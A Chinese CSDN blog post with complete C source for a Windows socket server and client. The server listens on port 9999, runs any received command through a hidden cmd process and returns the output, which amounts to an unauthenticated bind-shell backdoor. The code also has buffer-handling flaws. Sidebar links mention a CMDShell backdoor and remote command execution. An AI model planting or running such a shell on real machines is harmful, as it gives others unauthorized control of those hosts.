SocketCmdShell

最新推荐文章于 2021-07-26 14:10:48 发布
最新推荐文章于 2021-07-26 14:10:48 发布
阅读量240 收藏
点赞数 1
分类专栏: windows编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20307987/article/details/77469963
版权

利用管道获取cmd命令记录
Server:

#include <stdio.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char* argv[])
{
    //初始化WSA
    WORD sockVersion = MAKEWORD(2,2);
    WSADATA wsaData;
    if(WSAStartup(sockVersion, &wsaData)!=0)
    {
        return 0;
    }

    //创建套接字
    SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(slisten == INVALID_SOCKET)
    {
        printf("socket error !");
        return 0;
    }

    //绑定IP和端口
    sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(9999);
    sin.sin_addr.S_un.S_addr = INADDR_ANY; 
    if(bind(slisten, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        printf("bind error !");
    }

    //开始监听
    if(listen(slisten, 5) == SOCKET_ERROR)
    {
        printf("listen error !");
        return 0;
    }

    //循环接收数据
    SOCKET sClient;
    sockaddr_in remoteAddr;
    int nAddrlen = sizeof(remoteAddr);
    char revData[255]={0}; 
    while (TRUE)
    {
    //  printf("等待连接...\n");
        sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen);
        if(sClient == INVALID_SOCKET)
        {
            printf("accept error !");
            //     continue;
        }
    //  printf("接受到一个连接:%s \r\n", inet_ntoa(remoteAddr.sin_addr));
        while(TRUE)
        {
            //接收数据
            memset(revData,0,256);

            int ret = recv(sClient, revData, 255, 0);        
            if(ret > 0)
            {
                revData[ret] = 0x00;
                //printf(revData);
            }

            if (ret == 0)
                continue;
            if(ret<0)
                break;
            SECURITY_ATTRIBUTES sa;
            HANDLE hRead,hWrite;

            sa.nLength = sizeof(SECURITY_ATTRIBUTES);
            sa.lpSecurityDescriptor = NULL;
            sa.bInheritHandle = TRUE;

            if(!CreatePipe(&hRead,&hWrite,&sa,0))
            {
                //      MessageBox(NULL,"Error on CreatePipe","ERROR",NULL);
                return 0;
            }

            STARTUPINFOA si;
            PROCESS_INFORMATION pi;
            memset(&si,0,sizeof(si));
            memset(&pi,0,sizeof(pi));
            si.cb = sizeof(STARTUPINFO);
            GetStartupInfoA(&si);

            si.hStdError = hWrite;
            si.hStdOutput = hWrite;
            si.wShowWindow = SW_HIDE;
            si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

            if(!CreateProcessA(NULL,revData,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
            {
                send(sClient,"Cmd Error\n",strlen("Cmd Error\n"),0);
                continue;
            }
        //  printf("GetLastError: %d\n",GetLastError());
            CloseHandle(hWrite);
            WaitForSingleObject(pi.hProcess,5000);

            char buffer[1024] = {0};

            int len=0;
            DWORD byteRead;
            BOOL hResult;
            do
            {
                memset(buffer,0,1024);  
                //when second ReadFile Program Stop here 
                hResult = ReadFile(hRead,buffer,1023,&byteRead,NULL);
                //printf("%s\n",buffer);
                len = len + byteRead;
                //loop send
                send(sClient, buffer, strlen(buffer), 0);

            }while(byteRead!=0 && hResult);
            //CloseHandle(hWrite);
            CloseHandle(hRead);
        }
        closesocket(sClient);
    }

    closesocket(slisten);
    WSACleanup();
    getchar();
    return 0;
}

Client:

#include <winsock2.h>
#include <stdio.h>

#pragma  comment(lib,"ws2_32.lib")

int main(int argc, char* argv[])
{
    WORD sockVersion = MAKEWORD(2,2);
    WSADATA data; 

    if(WSAStartup(sockVersion, &data) != 0)
    {
        return 0;
    }

    SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(sclient == INVALID_SOCKET)
    {
        printf("invalid socket !");
        return 0;
    }

    sockaddr_in serAddr;
    serAddr.sin_family = AF_INET;
    serAddr.sin_port = htons(9999);
    serAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); 

    if (connect(sclient, (sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
    {
        printf("connect error !");
        closesocket(sclient);
        return 0;
    }

    char szSendCmd[256]= {0};
    char szReciveResult[1024]={0};
    int iRet ;
    while(TRUE)
    {
        memset(szSendCmd,0,256);

        memset(szReciveResult,0,1024);

        printf("Please Input cmd Command:\n");

        gets(szSendCmd);
        if(strlen(szSendCmd) == 0)
            continue;
        printf("szSendCmd : %s\n",szSendCmd);
        if(!strcmp(szSendCmd,"exit"))
        {
            printf("stop shell ^-^ Exit! Please Input Enter\n");
            getchar();
            break;
        }
        send(sclient,szSendCmd,strlen(szSendCmd),0);
        while(TRUE)
        {
            memset(szReciveResult,0,1024);
            iRet = recv(sclient,szReciveResult,1023,0);

            if(!strcmp(szReciveResult,"Cmd Error\n"))
            {
                szReciveResult[iRet]=0x00;
                printf(szReciveResult);
                break;
            }
            if((iRet>0)&&(iRet==1023))
            {
                szReciveResult[iRet]=0x00;
                printf(szReciveResult);
            }
            if(iRet < 1023)
            {
                szReciveResult[iRet]=0x00;
                printf(szReciveResult);
                break;

            }
        }
    }

    closesocket(sclient);
    WSACleanup();
    return 0;
}
R_1v3r
关注
专栏目录
制作简单的Socket连接
WL_5466的博客
06-19 503
今天来写一篇关于Socket联网的文章吧!,这篇文章写完后可实现一个简易的服务器和客户端的连接。打开VS新建一个控制台应用程序。using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;//网络通信using System.Net;us...
使用Socketcmd命令行聊天
weixin_30786657的博客
10-21 4540
Socket:两个程序通过一个双向的通信连接实现数据的交换,这个链接的一端就称为Socket 特性:持久链接,双向通信 首先要有服务器与客户端两端 开一个服务器server,引用node的核心模块net const net = require("net"); const clients = []; const server = net.createServer();ser...
cmd运行php代码、socket
weixin_30399155的博客
07-10 288
一、用cmd运行php代码,首先要对电脑进行配置: 1.右击计算机-属性-高级系统设置-环境变量,我们需要添加环境变量。 2.在Administrator的用户变量(U)下点击新建,弹出对话框,变量名(N)写:PHP_HOME,变量值(V)为你的php程序的安装路径,例如我的是:D:\wamp\bin\php\php5.5.12\php.exe,写好之后点击确定。 3.在系统变量(S)下找到...
linux下的守护(精灵)进程daemon
QQ845264718
11-28 178
#include <stdio.h> #include<fcntl.h> #include<sys/types.h> #include<unistd.h> #include<stdlib.h> #include<sys/wait.h> #include<string.h> #include<sys/stat.h> int main() { //0.准备变量 pid_t pid; int
CMD连接socket server 端,并发送消息
Brave_heart4pzj的博客
07-18 5239
打开cmd 输入命令:telnet 127.0.0.1 7000 回车 这个是后是全黑的,再次输入:ctrl + ] (中括号) 用send函数发送消息 参考:https://www.bilibili.com/video/BV1DJ411m7NR?p=6
一个简单的CMDShell后门
小马[SmallHorse] 偶尔过来发发牢骚。。。
09-14 1427
很久以前写的一段小代码,实现一个简单的CMDShell后门。贴出来再回味一下!注释少了些,见谅!呵呵!程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接连接可以使用nc。用法:smallhorse [-p port] -p参数用于设置自己的端口在vc++6.0 WIN2003下编译通过#includewinsock2.h>#include stdio.h>#pr
python 网络编程 04 socket模块 subprocess模块 执行远程CMD指令|徐奥雯整理XUAOWEN
徐奥雯-ASSETS
07-26 625
客户端向服务器发送CMD指令,并返回执行结果. # 服务器端 import socket import subprocess # subprocess模块可用于执行cmd命令 sk = socket.socket() sk.bind(('127.0.0.1',8080)) sk.listen() conn, addr = sk.accept() cmd = conn.recv(1024).decode('utf-8') r = subprocess.Popen(cmd, shell=True, s
shell建立socket连接
任我行的博客
12-20 5658
建立socket的两种方式 udp:/dev/udp/host/port tcp:/dev/tcp/host/port 直接重定向当前shell的一个文件描述符到对应的ip/端口: exec 8<>/dev/udp/10.0.2.15/12345 就相当于建立一个UDP socket。 发送报文: echo “” >&8 使用tcpdump抓包: 00:48:18.291...
windows程序设计之简单界面入门
热门推荐
river
06-16 1万+
突然自己想完整地写一款mm,除了网络通信、文件操作之类的功能类代码外,还要搞一个界面的东西。想了想,为了快速看到成果就学学界面编程吧,也方便看别人的带界面的代码。于是乎,决定windows编程先从界面开始写。 新建一个空的win32工程,只有以下代码:#include "stdafx.h" int APIENTRY WinMain(HINSTANCE hInstance,
WindowsAPI获取主机操作系统信息
river
07-13 4358
VOID SafeGetNativeSystemInfo(__out LPSYSTEM_INFO lpSystemInfo) { if (NULL==lpSystemInfo) return; typedef VOID (WINAPI *LPFN_GetNativeSystemInfo)(LPSYSTEM_INFO lpSystemInfo); LPFN_Ge
WindowsAPI获取主机网络配置和网络连接信息
river
07-13 3669
//获取主机网络配置 int GetNetConfigInfo () { /* Declare and initialize variables */// It is possible for an adapter to have multiple // IPv4 addresses, gateways, and secondary WINS servers // assigned to t
多字节、宽字节转换代码--MutiByteToWideChar & WideCharToMutiByte
river
12-28 1903
/************************************************************************/ /* Project: 宽字节与多字节互相转换 */ /* Author: LandyTan
windows注册表操作
river
07-09 1721
#include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;time.h&amp;gt; #include &amp;lt;windows.h&amp;gt; int main(int argc, char *argv[]) { LONG lRet = 0; HKEY hKeyProg = NULL; char s
解析文件路径,获取文件名和扩展名
river
08-23 1508
_splitpath函数  在c或者c++编程中,常常会用到获取程序或文件的路径,比对路径做分解和合并处理,_splitpath和_makepath就可以完成这样的功能。   函数的声明   void _splitpath( const char *path, char *drive, char *dir, char *fname, char *ext );   功能是分解路径,把你的完整路径
通过进程获取exe全路径
river
12-28 1330
#include<stdio.h> #include<Windows.h> #include<Psapi.h> #pragma comment(lib,"Psapi.lib") int main() { TCHAR path[MAX_PATH+1]={0}; HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCE
判断系统是否是XP
river
12-28 1247
#include<stdio.h> #include<Windows.h> int GetOSVer() { OSVERSIONINFO osver; osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&osver); if(osver.dwPlatf
windowsAPI发送ICMP包
river
12-28 1229
#include <winsock2.h> #include <iphlpapi.h> #include <icmpapi.h> #include <stdio.h>#pragma comment(lib, "iphlpapi.lib") #pragma comment(lib, "ws2_32.lib")int __cdecl main(int argc, char **argv) { /
c++编写windows服务
river
11-29 1175
// GtServ.cpp : Defines the entry point for the console application. // #include&lt;stdio.h&gt; #include&lt;Windows.h&gt; #include&lt;tchar.h&gt; SERVICE_STATUS m_ServiceStatus; SERVICE_STATUS_HAN...
windows 磁盘文件目录遍历
river
08-03 1124
#define _CRT_SECURE_NO_WARNINGS // #include &lt;windows.h&gt; #include &lt;Shlwapi.h&gt; #include &lt;iostream&gt; #include &lt;string&gt; #include &lt;vector&gt; #pragma comment(lib,"shlwapi.lib") ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值